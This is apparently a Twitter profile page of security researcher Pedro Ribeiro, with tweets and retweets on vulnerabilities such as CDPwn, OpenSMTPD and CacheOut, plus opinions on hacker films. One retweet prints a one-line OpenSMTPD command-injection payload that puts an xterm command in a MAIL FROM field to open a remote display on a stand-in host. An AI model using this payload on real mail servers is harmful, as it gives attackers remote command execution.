|
Pedro Ribeiro
@
pedrib1337
|
|
Reverse Engineer, Director of Research at Agile Information Security and member of Pwn2Own Flashback team. My pronouns are pwn/pwner.
|
|
|
305
Tweetovi
|
147
Pratim
|
668
Osobe koje vas prate
|
| Tweetovi |
|
Pedro Ribeiro
@pedrib1337
|
24 h |
|
Awesome!
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
6. velj |
|
Little things like "technical details" don't matter when you need an eye catching headline
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
6. velj |
|
I think that's a problem as a researcher in general.
The rabbit holes get smaller and smaller with ALSR and other protections, but as complexity increases we also get more of those holes
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
5. velj |
|
The link to the cdpwn on their website seems to be dead
|
||
|
|
||
| Pedro Ribeiro proslijedio/la je tweet | ||
|
Catalin Cimpanu
@campuscodi
|
5. velj |
|
CDPwn vulnerabilities impact tens of millions of enterprise devices
- CDPwn impacts Cisco's Discovery Protocol (CDP)
- CDPwn = 4 RCEs + 1 DOS
- LAN exploitable, not via WAN
- ideal for escalating access and taking over entire networks
zdnet.com/article/cdpwn-… pic.twitter.com/eOoZIl2T8R
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
30. sij |
|
Doesn't beat The Matrix, but it's still better than Hackers
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
30. sij |
|
Never seen it, but looks good! It's now on my list
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
30. sij |
|
Unpopular opinion: "Hackers" (1995) is a shit film, and the ultimate hacker film is "The Matrix" (1999)
|
||
|
|
||
| Pedro Ribeiro proslijedio/la je tweet | ||
|
Joxean Koret
@matalaz
|
30. sij |
|
OpenBSD sEcUrE bY DeFaUlT exploit:
MAIL FROM:<;xterm --display yourip:0;>
|
||
|
|
||
| Pedro Ribeiro proslijedio/la je tweet | ||
|
Ghidra Ninja
@ghidraninja
|
29. sij |
|
If you are into C++ reverse engineering and never tried OOAnalyzer you are missing out big time! insights.sei.cmu.edu/sei_blog/2019/…
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
29. sij |
|
Now if only Intel fixed their iommu - on some systems it is hopelessly broken and causes lots of crashes.
|
||
|
|
||
| Pedro Ribeiro proslijedio/la je tweet | ||
|
dragosr
@dragosr
|
29. sij |
|
Old school, mail to shell script, code exec and privilege escalation in OpenSMTPD
openwall.com/lists/oss-secu…
|
||
|
|
||
| Pedro Ribeiro proslijedio/la je tweet | ||
|
D̒͂̕ᵈăᵃn̕ᶰ Ť̾̾̓͐͒͠ᵗe͗̑́̋̂́͡ᵉn̅ᶰtᵗl̀̓͘ᶫe̓̒̂̚ᵉrʳ
@Viss
|
27. sij |
|
can confirm.
enable defender, crank it all the way up. as a redteamer, i can say its a pain in the ass to get around, so defenders should take advantage of that. twitter.com/mshelton/statu…
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
27. sij |
|
Very interesting - are you publishing a PoC?
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
27. sij |
|
“Moreover, CacheOut bypasses the hardware mitigations released by Intel in response to Meltdown, thereby necessitating additional software fixes."
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
27. sij |
|
Another nail in the coffin of Intel's supposed performance advantage:
"AMD is not affected by CacheOut, as AMD does not offer any feature akin to Intel TSX on their current offering of CPUs.” twitter.com/MarinaMinkin/s…
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
27. sij |
|
Reminder that if you're not paying, you're the product twitter.com/josephfcox/sta…
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
26. sij |
|
Than I'm definitely complaining to the right person
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
26. sij |
|
And the problem is, either there aren't enough of those around, or companies don't want to pay for them.
|
||
|
|
||
|
Pedro Ribeiro
@pedrib1337
|
26. sij |
|
Just goes to show, you can model all you want, you will still get owned.
Not saying it's not worth it, but definitely has to be supported by highly skilled "manual" pentesters.
|
||
|
|
||